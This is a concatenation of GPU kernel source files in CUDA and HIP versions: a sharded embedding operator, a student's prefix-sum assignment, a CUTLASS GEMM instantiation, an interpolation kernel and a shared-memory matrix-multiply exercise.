Compute(const framework::ExecutionContext &context) const override { auto *table_t = context.Input<LoDTensor>("W"); auto *ids_t = context.Input<LoDTensor>("Ids"); auto *output_t = context.Output<LoDTensor>("Out"); const auto &dev_ctx = context.template device_context<platform::CUDADeviceContext>(); const int64_t start_idx = context.Attr<int64_t>("start_index"); size_t N = table_t->dims()[0]; size_t D = table_t->dims()[1]; size_t K = ids_t->numel(); const int64_t end_idx = start_idx + N; auto *table = table_t->data<T>(); auto *output = output_t->mutable_data<T>(context.GetPlace()); auto limit = K * D; int blocks = NumBlocks(limit); int threads = kNumCUDAThreads; const auto &index_type = ids_t->type(); if (index_type == framework::proto::VarType::INT32) { CEmbedding<T, int32_t><<<blocks, threads, 0, dev_ctx.stream()>>>( output, table, ids_t->data<int32_t>(), K, D, N, start_idx, end_idx, limit); } else if (index_type == framework::proto::VarType::INT64) { CEmbedding<T, int64_t><<<blocks, threads, 0, dev_ctx.stream()>>>( output, table, ids_t->data<int64_t>(), K, D, N, start_idx, end_idx, limit); } else { PADDLE_THROW(platform::errors::Unavailable( "GPU 
c_embedding ids only support int32 or int64.")); } } }; template <typename T> class CEmbeddingGradCUDAKernel : public framework::OpKernel<T> { public: void Compute(const framework::ExecutionContext &context) const override { const auto &dev_ctx = context.template device_context<platform::CUDADeviceContext>(); const int64_t start_idx = context.Attr<int64_t>("start_index"); auto ids_t = context.Input<LoDTensor>("Ids"); auto d_output_t = context.Input<LoDTensor>(framework::GradVarName("Out")); auto d_table_t = context.Output<LoDTensor>(framework::GradVarName("W")); int N = d_table_t->dims()[0]; int D = d_table_t->dims()[1]; int K = ids_t->numel(); const int64_t end_idx = start_idx + N; auto limit = K * D; int blocks = NumBlocks(limit); int threads = kNumCUDAThreads; const T *d_output = d_output_t->data<T>(); T *d_table = d_table_t->mutable_data<T>(context.GetPlace()); auto t = framework::EigenVector<T>::Flatten(*d_table_t); t.device(*dev_ctx.eigen_device()) = t.constant(static_cast<T>(0)); const auto &index_type = ids_t->type(); if (index_type == framework::proto::VarType::INT32) { CEmbeddingGrad<T, int32_t><<<blocks, threads, 0, dev_ctx.stream()>>>( d_table, d_output, ids_t->data<int32_t>(), K, D, N, start_idx, end_idx, limit); } else if (index_type == framework::proto::VarType::INT64) { CEmbeddingGrad<T, int64_t><<<blocks, threads, 0, dev_ctx.stream()>>>( d_table, d_output, ids_t->data<int64_t>(), K, D, N, start_idx, end_idx, limit); } } }; } // namespace operators } // namespace paddle namespace ops = paddle::operators; namespace plat = paddle::platform; REGISTER_OP_CUDA_KERNEL(c_embedding, ops::CEmbeddingCUDAKernel<float>, ops::CEmbeddingCUDAKernel<double>, ops::CEmbeddingCUDAKernel<plat::float16>); REGISTER_OP_CUDA_KERNEL(c_embedding_grad, ops::CEmbeddingGradCUDAKernel<float>, ops::CEmbeddingGradCUDAKernel<double>, ops::CEmbeddingGradCUDAKernel<plat::float16>);
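These kernels implement a vocabulary-sharded embedding: each rank owns rows [start_index, start_index + N) of the global table, the forward pass writes zeros for ids outside that range, and the backward pass atomically accumulates gradients only into the locally owned rows. A scalar reference of the forward rule, with float and invented names purely for illustration:

// Semantics of one output element out[row * columns + col] on a single shard.
float c_embedding_forward_ref(const float* table, long long id, long long start_idx,
                              long long end_idx, int columns, int col)
{
    if (id >= start_idx && id < end_idx)
        return table[(id - start_idx) * columns + col];  // row owned by this shard
    return 0.0f;  // owned by some other rank; that rank's shard supplies the value instead
}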
8c568d4f283a5aa53c549460423fc1a78eb7f47b.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /** * University of Pittsburgh * Department of Computer Science * CS1645: Introduction to HPC Systems * Instructor Bryan Mills, PhD * This is a skeleton for implementing prefix sum using GPU, inspired * by nvidia course of similar name. * * student: Charles Smith <[email protected]> */ #include <stdio.h> #include "timer.h" #include <math.h> #include <string.h> #define N 512 /* * You should implement the simple scan function here! */ __global__ void scan_simple(float *g_odata, float *g_idata, int n) { extern __shared__ float temp[]; // STUDENT: YOUR CODE GOES HERE. g_odata[threadIdx.x] = 0.0; int pin=1, pout=0; //keep track of where in the temp array we are. 0 for first half, 1 for second if(threadIdx.x<511) temp[threadIdx.x+1] = g_idata[threadIdx.x]; int offset; //how far away we're adding from for(offset=1; offset<n; offset*=2){ //swap the buffers pin =1 - pin ; pout =1 - pout; //in general we try to avoid branching on GPUs as it is a giant decrease to preformance //but there's not to many ways around this one if(threadIdx.x>=offset)//we have work to do! temp[pout*n+threadIdx.x] = temp[pin*n+threadIdx.x] + temp[pin*n+threadIdx.x - offset]; //sum else //we already found the answer, let's keep track of it temp[pout*n+threadIdx.x] = temp[pin*n+threadIdx.x]; __syncthreads(); //don't want to do work before everyone is ready } //great! we have the answer! (i think...) let's copy it to the output buffer g_odata[threadIdx.x] = temp[pout*n+threadIdx.x]; } /* * You should implement the prescan kernel function here! */ __global__ void prescan(float *g_odata, float *g_idata, int n) { extern __shared__ float temp[]; //to many headaches working on this.... I looked at the linked code and started fresh. // g_odata[threadIdx.x] = g_idata[threadIdx.x]; // // // STUDENT: YOUR CODE GOES HERE. 
// temp[threadIdx.x] = g_idata[threadIdx.x]; // // int offset = 1; //how far to move the data // //upsweep // __syncthreads();//get everyone together // for(; offset<n; offset*=2){ // if(!(threadIdx.x+1)%(offset*2)) // temp[threadIdx.x] += temp[threadIdx.x-offset]; // __syncthreads(); // printf("offset = %d, temp = %f, threadIdx.x = %d\n",offset, temp[threadIdx.x], threadIdx.x); // } // // if(threadIdx.x==0) // temp[n-1] = 0; //clear the last entry // // offset/=2; // __syncthreads(); // // //downsweep // for(; offset>=1;offset/=2){ // if(!(threadIdx.x+1)%(offset*2)){ // //swaps // float t = temp[threadIdx.x-offset]; // temp[threadIdx.x-offset] = temp[threadIdx.x]; // temp[threadIdx.x]+=t; // // } // __syncthreads(); // printf("offset = %d, temp = %f, threadIdx.x = %d\n",offset, temp[threadIdx.x], threadIdx.x); // __syncthreads(); // } // printf("temp[%d] = %f\n", threadIdx.x, temp[threadIdx.x]); // g_odata[threadIdx.x]=temp[threadIdx.x]; // printf("g_odata[%d] = %f\n", threadIdx.x, g_odata[threadIdx.x]); int offset = 1; temp[2*threadIdx.x] = g_idata[2*threadIdx.x]; temp[2*threadIdx.x+1] = g_idata[2*threadIdx.x+1]; for(int i = n/2; i > 0; i/=2){ __syncthreads(); if(threadIdx.x < i) { int ai = offset*(2*threadIdx.x+1)-1; int bi = offset*(2*threadIdx.x+2)-1; temp[bi] += temp[ai]; } offset *= 2; } if(threadIdx.x == 0) { temp[n - 1] = 0; } for(int i = 1; i < n; i *= 2) { offset /= 2; __syncthreads(); if(threadIdx.x < i){ int ai = offset*(2*threadIdx.x+1)-1; int bi = offset*(2*threadIdx.x+2)-1; float t = temp[ai]; temp[ai] = temp[bi]; temp[bi] += t; } __syncthreads(); } __syncthreads(); //HEY LOOK IT COPIES THIS TIME AHHHHHHHHH g_odata[2*threadIdx.x] = temp[2*threadIdx.x]; g_odata[2*threadIdx.x+1] = temp[2*threadIdx.x+1]; } /* * Fills an array a with n random floats. */ void random_floats(float* a, int n) { float d; // Comment out this line if you want consistent "random". srand(time(NULL)); for (int i = 0; i < n; ++i) { d = rand() % 8; a[i] = ((rand() % 64) / (d > 0 ? d : 1)); } } /* * Simple Serial implementation of scan. */ void serial_scan(float* out, float* in, int n) { float total_sum = 0; out[0] = 0; for (int i = 1; i < n; i++) { total_sum += in[i-1]; out[i] = out[i-1] + in[i-1]; } if (total_sum != out[n-1]) { printf("Warning: exceeding accuracy of float.\n"); } } /* * This is a simple function that confirms that the output of the scan * function matches that of a golden image (array). 
*/ bool printError(float *gold_out, float *test_out, bool show_all) { bool firstFail = true; bool error = false; float epislon = 0.1; float diff = 0.0; for (int i = 0; i < N; ++i) { diff = abs(gold_out[i] - test_out[i]); if ((diff > epislon) && firstFail) { printf("ERROR: gold_out[%d] = %f != test_out[%d] = %f // diff = %f \n", i, gold_out[i], i, test_out[i], diff); firstFail = show_all; error = true; } } return error; } int main(void) { float *in, *out, *gold_out; // host float *d_in, *d_out; // device int size = sizeof(float) * N; timerStart(); hipMalloc((void **)&d_in, size); hipMalloc((void **)&d_out, size); in = (float *)malloc(size); random_floats(in, N); out = (float *)malloc(size); gold_out = (float *)malloc(size); printf("TIME: Init took %d ms\n", timerStop()); // *********** // RUN SERIAL SCAN // *********** timerStart(); serial_scan(gold_out, in, N); printf("TIME: Serial took %d ms\n", timerStop()); timerStart(); hipMemcpy(d_in, in, size, hipMemcpyHostToDevice); printf("TIME: Copy took %d ms\n", timerStop()); // *********** // RUN SIMPLE SCAN // *********** timerStart(); hipLaunchKernelGGL(( scan_simple), dim3(1), dim3(512), N * 2 * sizeof(float), 0, d_out, d_in, N); hipDeviceSynchronize(); printf("TIME: Simple kernel took %d ms\n", timerStop()); timerStart(); hipMemcpy(out, d_out, size, hipMemcpyDeviceToHost); printf("TIME: Copy back %d ms\n", timerStop()); if (printError(gold_out, out, true)) { printf("ERROR: The simple scan function failed to produce proper output.\n"); //printf("produced output:\n"); //for(int i=0; i<512; i++){ // printf("%d: %f\n",i, out[i]); //} } else { printf("CONGRATS: The simple scan function produced proper output.\n"); } out[0]=-2; out[1]=-2; // *********** // RUN PRESCAN // note size change in number of threads, only need 256 because each // thread should handle 2 elements. // *********** timerStart(); hipLaunchKernelGGL(( prescan), dim3(1), dim3(256), N * 2 * sizeof(float), 0, d_out, d_in, N); hipDeviceSynchronize(); printf("TIME: Prescan kernel took %d ms\n", timerStop()); timerStart(); hipMemcpy(out, d_out, size, hipMemcpyDeviceToHost); printf("TIME: Copy back %d ms\n", timerStop()); if (printError(gold_out, out, true)) { printf("ERROR: The prescan function failed to produce proper output.\n"); } else { printf("CONGRATS: The prescan function produced proper output.\n"); } return 0; }
8c568d4f283a5aa53c549460423fc1a78eb7f47b.cu
/** * University of Pittsburgh * Department of Computer Science * CS1645: Introduction to HPC Systems * Instructor Bryan Mills, PhD * This is a skeleton for implementing prefix sum using GPU, inspired * by nvidia course of similar name. * * student: Charles Smith <[email protected]> */ #include <stdio.h> #include "timer.h" #include <math.h> #include <string.h> #define N 512 /* * You should implement the simple scan function here! */ __global__ void scan_simple(float *g_odata, float *g_idata, int n) { extern __shared__ float temp[]; // STUDENT: YOUR CODE GOES HERE. g_odata[threadIdx.x] = 0.0; int pin=1, pout=0; //keep track of where in the temp array we are. 0 for first half, 1 for second if(threadIdx.x<511) temp[threadIdx.x+1] = g_idata[threadIdx.x]; int offset; //how far away we're adding from for(offset=1; offset<n; offset*=2){ //swap the buffers pin =1 - pin ; pout =1 - pout; //in general we try to avoid branching on GPUs as it is a giant decrease to preformance //but there's not to many ways around this one if(threadIdx.x>=offset)//we have work to do! temp[pout*n+threadIdx.x] = temp[pin*n+threadIdx.x] + temp[pin*n+threadIdx.x - offset]; //sum else //we already found the answer, let's keep track of it temp[pout*n+threadIdx.x] = temp[pin*n+threadIdx.x]; __syncthreads(); //don't want to do work before everyone is ready } //great! we have the answer! (i think...) let's copy it to the output buffer g_odata[threadIdx.x] = temp[pout*n+threadIdx.x]; } /* * You should implement the prescan kernel function here! */ __global__ void prescan(float *g_odata, float *g_idata, int n) { extern __shared__ float temp[]; //to many headaches working on this.... I looked at the linked code and started fresh. // g_odata[threadIdx.x] = g_idata[threadIdx.x]; // // // STUDENT: YOUR CODE GOES HERE. 
// temp[threadIdx.x] = g_idata[threadIdx.x]; // // int offset = 1; //how far to move the data // //upsweep // __syncthreads();//get everyone together // for(; offset<n; offset*=2){ // if(!(threadIdx.x+1)%(offset*2)) // temp[threadIdx.x] += temp[threadIdx.x-offset]; // __syncthreads(); // printf("offset = %d, temp = %f, threadIdx.x = %d\n",offset, temp[threadIdx.x], threadIdx.x); // } // // if(threadIdx.x==0) // temp[n-1] = 0; //clear the last entry // // offset/=2; // __syncthreads(); // // //downsweep // for(; offset>=1;offset/=2){ // if(!(threadIdx.x+1)%(offset*2)){ // //swaps // float t = temp[threadIdx.x-offset]; // temp[threadIdx.x-offset] = temp[threadIdx.x]; // temp[threadIdx.x]+=t; // // } // __syncthreads(); // printf("offset = %d, temp = %f, threadIdx.x = %d\n",offset, temp[threadIdx.x], threadIdx.x); // __syncthreads(); // } // printf("temp[%d] = %f\n", threadIdx.x, temp[threadIdx.x]); // g_odata[threadIdx.x]=temp[threadIdx.x]; // printf("g_odata[%d] = %f\n", threadIdx.x, g_odata[threadIdx.x]); int offset = 1; temp[2*threadIdx.x] = g_idata[2*threadIdx.x]; temp[2*threadIdx.x+1] = g_idata[2*threadIdx.x+1]; for(int i = n/2; i > 0; i/=2){ __syncthreads(); if(threadIdx.x < i) { int ai = offset*(2*threadIdx.x+1)-1; int bi = offset*(2*threadIdx.x+2)-1; temp[bi] += temp[ai]; } offset *= 2; } if(threadIdx.x == 0) { temp[n - 1] = 0; } for(int i = 1; i < n; i *= 2) { offset /= 2; __syncthreads(); if(threadIdx.x < i){ int ai = offset*(2*threadIdx.x+1)-1; int bi = offset*(2*threadIdx.x+2)-1; float t = temp[ai]; temp[ai] = temp[bi]; temp[bi] += t; } __syncthreads(); } __syncthreads(); //HEY LOOK IT COPIES THIS TIME AHHHHHHHHH g_odata[2*threadIdx.x] = temp[2*threadIdx.x]; g_odata[2*threadIdx.x+1] = temp[2*threadIdx.x+1]; } /* * Fills an array a with n random floats. */ void random_floats(float* a, int n) { float d; // Comment out this line if you want consistent "random". srand(time(NULL)); for (int i = 0; i < n; ++i) { d = rand() % 8; a[i] = ((rand() % 64) / (d > 0 ? d : 1)); } } /* * Simple Serial implementation of scan. */ void serial_scan(float* out, float* in, int n) { float total_sum = 0; out[0] = 0; for (int i = 1; i < n; i++) { total_sum += in[i-1]; out[i] = out[i-1] + in[i-1]; } if (total_sum != out[n-1]) { printf("Warning: exceeding accuracy of float.\n"); } } /* * This is a simple function that confirms that the output of the scan * function matches that of a golden image (array). 
*/ bool printError(float *gold_out, float *test_out, bool show_all) { bool firstFail = true; bool error = false; float epislon = 0.1; float diff = 0.0; for (int i = 0; i < N; ++i) { diff = abs(gold_out[i] - test_out[i]); if ((diff > epislon) && firstFail) { printf("ERROR: gold_out[%d] = %f != test_out[%d] = %f // diff = %f \n", i, gold_out[i], i, test_out[i], diff); firstFail = show_all; error = true; } } return error; } int main(void) { float *in, *out, *gold_out; // host float *d_in, *d_out; // device int size = sizeof(float) * N; timerStart(); cudaMalloc((void **)&d_in, size); cudaMalloc((void **)&d_out, size); in = (float *)malloc(size); random_floats(in, N); out = (float *)malloc(size); gold_out = (float *)malloc(size); printf("TIME: Init took %d ms\n", timerStop()); // *********** // RUN SERIAL SCAN // *********** timerStart(); serial_scan(gold_out, in, N); printf("TIME: Serial took %d ms\n", timerStop()); timerStart(); cudaMemcpy(d_in, in, size, cudaMemcpyHostToDevice); printf("TIME: Copy took %d ms\n", timerStop()); // *********** // RUN SIMPLE SCAN // *********** timerStart(); scan_simple<<< 1, 512, N * 2 * sizeof(float)>>>(d_out, d_in, N); cudaDeviceSynchronize(); printf("TIME: Simple kernel took %d ms\n", timerStop()); timerStart(); cudaMemcpy(out, d_out, size, cudaMemcpyDeviceToHost); printf("TIME: Copy back %d ms\n", timerStop()); if (printError(gold_out, out, true)) { printf("ERROR: The simple scan function failed to produce proper output.\n"); //printf("produced output:\n"); //for(int i=0; i<512; i++){ // printf("%d: %f\n",i, out[i]); //} } else { printf("CONGRATS: The simple scan function produced proper output.\n"); } out[0]=-2; out[1]=-2; // *********** // RUN PRESCAN // note size change in number of threads, only need 256 because each // thread should handle 2 elements. // *********** timerStart(); prescan<<< 1, 256, N * 2 * sizeof(float)>>>(d_out, d_in, N); cudaDeviceSynchronize(); printf("TIME: Prescan kernel took %d ms\n", timerStop()); timerStart(); cudaMemcpy(out, d_out, size, cudaMemcpyDeviceToHost); printf("TIME: Copy back %d ms\n", timerStop()); if (printError(gold_out, out, true)) { printf("ERROR: The prescan function failed to produce proper output.\n"); } else { printf("CONGRATS: The prescan function produced proper output.\n"); } return 0; }
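As a concrete check of what the kernels should produce, here is the exclusive-scan recurrence from serial_scan worked on an 8-element array, together with the state the work-efficient prescan reaches after its up-sweep; the numbers below were computed by hand for this example only.

// in              = [3, 1, 7, 0, 4, 1, 6, 3]
// out[0]          = 0
// out[i]          = out[i-1] + in[i-1]
// exclusive scan  = [0, 3, 4, 11, 11, 15, 16, 22]
//
// prescan's up-sweep builds partial sums in place:
//   [3, 4, 7, 11, 4, 5, 6, 25]           (the last slot holds the total, 25)
// the down-sweep then zeroes the last slot and redistributes prefixes,
// ending with the same exclusive scan [0, 3, 4, 11, 11, 15, 16, 22].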
9b4119d2c54ba1f963e217634a10ec46641a262f.hip
// !!! This is a file automatically generated by hipify!!! #if __CUDACC_VER_MAJOR__ > 9 || (__CUDACC_VER_MAJOR__ == 9 && __CUDACC_VER_MINOR__ >= 2) // generated by gen_cutlass_matrix_mul_kern_impls.py // ignore warning of cutlass #pragma GCC diagnostic push #pragma GCC diagnostic ignored "-Wunused-parameter" #pragma GCC diagnostic ignored "-Wstrict-aliasing" #pragma GCC diagnostic ignored "-Wuninitialized" #pragma GCC diagnostic ignored "-Wmaybe-uninitialized" #include "src/cuda/matrix_mul/fp32_simt/matrix_mul_float_simt_cutlass_wrapper.cuinl" using LayoutA = cutlass::layout::ColumnMajor; using LayoutB = cutlass::layout::RowMajor; using ThreadBlockShape = cutlass::gemm::GemmShape<8, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using EpilogueOp = cutlass::epilogue::thread::LinearCombination<float, 1, float, float>; using Gemm = cutlass::gemm::device::Gemm< float, LayoutA, float, LayoutB, float, cutlass::layout::RowMajor, float, cutlass::arch::OpClassSimt, cutlass::arch::Sm50, ThreadBlockShape, WarpShape, InstructionShape, EpilogueOp, cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; template void megdnn::cuda::cutlass_wrapper::cutlass_matrix_mul_wrapper<Gemm>( const typename Gemm::ElementA* d_A, size_t lda, const typename Gemm::ElementB* d_B, size_t ldb, typename Gemm::ElementC* d_C, size_t ldc, int* workspace, cutlass::gemm::GemmCoord const& problem_size, typename Gemm::EpilogueOutputOp::Params const& epilogue, hipStream_t stream, int split_k_slices); #pragma GCC diagnostic pop #endif
9b4119d2c54ba1f963e217634a10ec46641a262f.cu
#if __CUDACC_VER_MAJOR__ > 9 || (__CUDACC_VER_MAJOR__ == 9 && __CUDACC_VER_MINOR__ >= 2) // generated by gen_cutlass_matrix_mul_kern_impls.py // ignore warning of cutlass #pragma GCC diagnostic push #pragma GCC diagnostic ignored "-Wunused-parameter" #pragma GCC diagnostic ignored "-Wstrict-aliasing" #pragma GCC diagnostic ignored "-Wuninitialized" #pragma GCC diagnostic ignored "-Wmaybe-uninitialized" #include "src/cuda/matrix_mul/fp32_simt/matrix_mul_float_simt_cutlass_wrapper.cuinl" using LayoutA = cutlass::layout::ColumnMajor; using LayoutB = cutlass::layout::RowMajor; using ThreadBlockShape = cutlass::gemm::GemmShape<8, 32, 8>; using WarpShape = cutlass::gemm::GemmShape<8, 32, 8>; using InstructionShape = cutlass::gemm::GemmShape<1, 1, 1>; using EpilogueOp = cutlass::epilogue::thread::LinearCombination<float, 1, float, float>; using Gemm = cutlass::gemm::device::Gemm< float, LayoutA, float, LayoutB, float, cutlass::layout::RowMajor, float, cutlass::arch::OpClassSimt, cutlass::arch::Sm50, ThreadBlockShape, WarpShape, InstructionShape, EpilogueOp, cutlass::gemm::threadblock::GemmIdentityThreadblockSwizzle<>, 2>; template void megdnn::cuda::cutlass_wrapper::cutlass_matrix_mul_wrapper<Gemm>( const typename Gemm::ElementA* d_A, size_t lda, const typename Gemm::ElementB* d_B, size_t ldb, typename Gemm::ElementC* d_C, size_t ldc, int* workspace, cutlass::gemm::GemmCoord const& problem_size, typename Gemm::EpilogueOutputOp::Params const& epilogue, cudaStream_t stream, int split_k_slices); #pragma GCC diagnostic pop #endif
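A hypothetical call site for the wrapper instantiated above, shown only as a sketch: the argument names are invented, and the epilogue parameters are assumed to be the usual alpha/beta pair accepted by cutlass::epilogue::thread::LinearCombination.

// Assumes d_A is column-major MxK, d_B row-major KxN, d_C row-major MxN,
// matching the LayoutA / LayoutB / output layout of the Gemm typedef above.
void run_f32_simt_gemm(const float* d_A, size_t lda, const float* d_B, size_t ldb,
                       float* d_C, size_t ldc, int* workspace,
                       int M, int N, int K, cudaStream_t stream)
{
    cutlass::gemm::GemmCoord problem_size(M, N, K);
    Gemm::EpilogueOutputOp::Params epilogue(1.0f, 0.0f);   // alpha = 1, beta = 0 (assumed form)
    megdnn::cuda::cutlass_wrapper::cutlass_matrix_mul_wrapper<Gemm>(
            d_A, lda, d_B, ldb, d_C, ldc, workspace,
            problem_size, epilogue, stream, /*split_k_slices=*/1);
}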
7bf495367384f61473698407bd148cb97aa168bc.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include "includes.h" // ERROR CHECKING MACROS ////////////////////////////////////////////////////// __global__ void interpolateMulti(int points, int noDims, int dimRes, float* surrogate, float* predictors, float* results) { // Global thread index int idx = blockIdx.x*blockDim.x + threadIdx.x; if (idx < points) { float *lower, *upper, *coeffs; int *lowerInd; lower = (float*)malloc((noDims)*sizeof(float)); upper = (float*)malloc((noDims)*sizeof(float)); coeffs = (float*)malloc(((int)pow(2,noDims-1))*sizeof(float)); lowerInd = (int*)malloc((noDims)*sizeof(float)); for (int jj = 0; jj < noDims; jj++) { lower[jj] = surrogate[jj*dimRes]; upper[jj] = surrogate[(jj+1)*dimRes - 1]; lowerInd[jj] = (int)((dimRes-1)*(predictors[noDims*idx+jj] - lower[jj])/(upper[jj] - lower[jj])); if (lowerInd[jj] >= (dimRes-1)) { lowerInd[jj] = dimRes-2; } else if (lowerInd[jj] < 0){ lowerInd[jj] = 0; } } // Let's interpolate // Uppermost dimensions x value float x0 = surrogate[lowerInd[0]]; float x1 = surrogate[lowerInd[0]+1]; float xd = (predictors[noDims*idx] - x0)/(x1-x0); // First, assign the yvalues to the coefficients matrix for (int jj = 0; jj < (int)pow(2,noDims-1); jj++) { // Get the indices of the yvalues of the lower and upper bounding // values on this dimension. int idxL = dimRes*noDims; for (int kk = 1; kk < noDims; kk++) { int rem = ((int)(jj/((int)pow(2,noDims - kk - 1))) + 1) - 2* (int)(((int)(jj/((int)pow(2,noDims - kk - 1))) + 1)/2); if(rem > 0) { idxL += lowerInd[kk]*(int)pow(dimRes,noDims - kk - 1); } else { idxL += (lowerInd[kk]+1)*(int)pow(dimRes,noDims - kk - 1); } } int idxU = idxL + (lowerInd[0]+1)*(int)pow(dimRes,noDims-1); idxL += lowerInd[0]*(int)pow(dimRes,noDims-1); coeffs[jj] = surrogate[idxL]*(1 - xd) + surrogate[idxU]*xd; } // Now we work our way down the dimensions using our computed // coefficients to get the interpolated value. for (int jj = 1; jj < noDims; jj++) { // Get the current dimension x value x0 = surrogate[jj*dimRes + lowerInd[jj]]; x1 = surrogate[jj*dimRes + lowerInd[jj] + 1]; xd = (predictors[jj] - x0)/(x1-x0); for (int kk = 0; kk < (int)pow(2,jj); kk++) { int jump = (int)pow(2,noDims - jj - 2); coeffs[kk] = coeffs[kk]*(1 - xd) + coeffs[kk + jump]*xd; } } // Free variables free(lowerInd); free(coeffs); free(upper); free(lower); // Output the result results[idx] = coeffs[0]; } }
7bf495367384f61473698407bd148cb97aa168bc.cu
#include "includes.h" // ERROR CHECKING MACROS ////////////////////////////////////////////////////// __global__ void interpolateMulti(int points, int noDims, int dimRes, float* surrogate, float* predictors, float* results) { // Global thread index int idx = blockIdx.x*blockDim.x + threadIdx.x; if (idx < points) { float *lower, *upper, *coeffs; int *lowerInd; lower = (float*)malloc((noDims)*sizeof(float)); upper = (float*)malloc((noDims)*sizeof(float)); coeffs = (float*)malloc(((int)pow(2,noDims-1))*sizeof(float)); lowerInd = (int*)malloc((noDims)*sizeof(float)); for (int jj = 0; jj < noDims; jj++) { lower[jj] = surrogate[jj*dimRes]; upper[jj] = surrogate[(jj+1)*dimRes - 1]; lowerInd[jj] = (int)((dimRes-1)*(predictors[noDims*idx+jj] - lower[jj])/(upper[jj] - lower[jj])); if (lowerInd[jj] >= (dimRes-1)) { lowerInd[jj] = dimRes-2; } else if (lowerInd[jj] < 0){ lowerInd[jj] = 0; } } // Let's interpolate // Uppermost dimensions x value float x0 = surrogate[lowerInd[0]]; float x1 = surrogate[lowerInd[0]+1]; float xd = (predictors[noDims*idx] - x0)/(x1-x0); // First, assign the yvalues to the coefficients matrix for (int jj = 0; jj < (int)pow(2,noDims-1); jj++) { // Get the indices of the yvalues of the lower and upper bounding // values on this dimension. int idxL = dimRes*noDims; for (int kk = 1; kk < noDims; kk++) { int rem = ((int)(jj/((int)pow(2,noDims - kk - 1))) + 1) - 2* (int)(((int)(jj/((int)pow(2,noDims - kk - 1))) + 1)/2); if(rem > 0) { idxL += lowerInd[kk]*(int)pow(dimRes,noDims - kk - 1); } else { idxL += (lowerInd[kk]+1)*(int)pow(dimRes,noDims - kk - 1); } } int idxU = idxL + (lowerInd[0]+1)*(int)pow(dimRes,noDims-1); idxL += lowerInd[0]*(int)pow(dimRes,noDims-1); coeffs[jj] = surrogate[idxL]*(1 - xd) + surrogate[idxU]*xd; } // Now we work our way down the dimensions using our computed // coefficients to get the interpolated value. for (int jj = 1; jj < noDims; jj++) { // Get the current dimension x value x0 = surrogate[jj*dimRes + lowerInd[jj]]; x1 = surrogate[jj*dimRes + lowerInd[jj] + 1]; xd = (predictors[jj] - x0)/(x1-x0); for (int kk = 0; kk < (int)pow(2,jj); kk++) { int jump = (int)pow(2,noDims - jj - 2); coeffs[kk] = coeffs[kk]*(1 - xd) + coeffs[kk + jump]*xd; } } // Free variables free(lowerInd); free(coeffs); free(upper); free(lower); // Output the result results[idx] = coeffs[0]; } }
be95215d518653bf3c128d9e6d66488923435e2a.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <stdio.h> #include <cstdlib> #include <iostream> #include <vector> #define BS 32 #define NUM_BLOCKS 1500 #define NUM_THREADS_PER_BLOCK 1500 #define SIZE NUM_BLOCKS*NUM_THREADS_PER_BLOCK using namespace std; hipEvent_t start, stop; // These are specific to measure the execution of only the kernel execution - might be useful void startKernelTime (void) { hipEventCreate(&start); hipEventCreate(&stop); hipEventRecord(start); } void stopKernelTime (void) { hipEventRecord(stop); hipEventSynchronize(stop); float milliseconds = 0; hipEventElapsedTime(&milliseconds, start, stop); cout << milliseconds << " ms have elapsed for the CUDA execution" << endl; } void checkCUDAError (const char *msg) { hipError_t err = hipGetLastError(); if( hipSuccess != err) { cerr << "Cuda error: " << msg << ", " << hipGetErrorString( err) << endl; exit(-1); } } // Fill the input parameters and kernel qualifier __global__ void dotKernel (float *dev_m1, float *dev_m2, float *dev_output) { __shared__ float shareA[BS][BS]; __shared__ float shareB[BS][BS]; int bx = blockIdx.x; int by = blockIdx.y; int tx = threadIdx.x; int ty = threadIdx.y; int row = by * BS + ty; int col = bx * BS + tx; float tmp_sum = 0.0f; for(int i = 0; i < NUM_BLOCKS/BS; ++i){ shareA[ty][tx] = dev_m1[row* NUM_BLOCKS + (i * BS + tx)]; shareB[ty][tx] = dev_m2[(i * BS + ty) * NUM_BLOCKS + col]; __syncthreads(); for(int k = 0; k < BS; ++k){ tmp_sum += shareA[ty][k] * shareB[k][tx]; __syncthreads(); } dev_output[row * NUM_BLOCKS + col] = tmp_sum; } } // Fill with the code required for the GPU dot (mem allocation, transfers, kernel launch of dotKernel) float* dotGPU (float *m1, float *m2) { float *dev_m1, *dev_m2, *dev_output; float *array_output = new float [SIZE]; // allocate the memory on the device hipMalloc((void**) &dev_m1, sizeof(float) * SIZE); hipMalloc((void**) &dev_m2, sizeof(float) * SIZE); hipMalloc((void**) &dev_output, sizeof(float) * SIZE); startKernelTime(); // copy inputs to the device hipMemcpy(dev_m1, m1, sizeof(float) * SIZE, hipMemcpyHostToDevice); hipMemcpy(dev_m2, m2, sizeof(float) * SIZE, hipMemcpyHostToDevice); hipMemcpy(dev_output, array_output, sizeof(float) * SIZE, hipMemcpyHostToDevice); dim3 blocksPerGrid(BS, BS, 1); dim3 threadsPerBlock(NUM_THREADS_PER_BLOCK/BS, NUM_THREADS_PER_BLOCK/BS, 1); // launch the kernel hipLaunchKernelGGL(( dotKernel) , dim3(blocksPerGrid), dim3(threadsPerBlock) , 0, 0, dev_m1, dev_m2, dev_output); // copy the output to the host hipMemcpy(array_output, dev_output, sizeof(float) * SIZE, hipMemcpyDeviceToHost); stopKernelTime(); for(size_t i = 0; i < 512; i++) { cout << array_output[i] << '\n'; } // free the device memory hipFree(dev_m1); hipFree(dev_m2); hipFree(dev_output); return array_output; } int main (int argc, char** argv) { float array1 [SIZE]; float array2 [SIZE]; // initialize array with random values for (unsigned i = 0; i < SIZE; i++) { array1[i] = ((float) rand()) / ((float) RAND_MAX) * 10; array2[i] = 1; } for(size_t i = 0; i < 4; i++) { cout << array1[i * NUM_BLOCKS] << '\n'; } dotGPU(array1, array2); return 0; }
be95215d518653bf3c128d9e6d66488923435e2a.cu
